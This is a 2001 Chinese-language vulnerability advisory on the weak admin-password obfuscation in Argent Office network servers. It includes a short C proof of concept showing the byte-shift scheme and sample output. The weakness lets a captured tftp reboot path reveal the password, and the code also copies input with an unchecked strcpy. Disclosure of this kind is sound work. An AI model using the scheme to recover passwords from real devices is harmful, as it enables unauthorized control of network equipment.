Avaya Argent Office 弱口令加密机制
发布日期:2001-08-07
更新日期:2001-08-08
受影响系统:
Network Alchemy(Avaya) Argent Office
描述:
Network Alchemy公司开发的Argent Office产品是一套综合了语音分组交换、网络数据连
接以及拨入服务功能的网络服务器。
它的管理口令的加密机制非常简单。如果攻击者通过网络监听等手段获取到加密后的口令,
就可以非常容易地进行解密。一旦得到了设备口令,攻击者就可以控制该网络设备。
例如,为了重新启动系统,管理员必须通过tftp来获取下列文件:
nasystem/rebootwhenfree/00e007002666/password//
00e007002666是MAC地址,password是加密后的口令。如果攻击者获取了上述密文,就可以
进行解密。
<*来源:Jacek Lipkowski (
sq5bpf@acid.ch.pw.edu.pl) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Jacek Lipkowski (
sq5bpf@acid.ch.pw.edu.pl)提供了下列测试方法:
/* argent_obfuscate.c
(c) 2001 Jacek Lipkowski sq5bpf@acid.ch.pw.edu.pl
demonstrates how the password obfuscation
mechanism works in argent office products */
main(int argc,char **argv)
{
int i;
unsigned char buf[32];
strcpy(&buf,argv[1]);
for (i=0;i<strlen(argv[1]);i++)
printf("0x%2.2X ",buf[i]+0x11-i);
printf("\n");
}
Show the hex values for the password 'idiocy':
~$ ./argent_obfuscate idiocy
0x7A 0x74 0x78 0x7D 0x70 0x85
建议:
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.midlandcomms.co.uk/argent_office.htm
浏览次数:3749
严重程度:0(网友投票)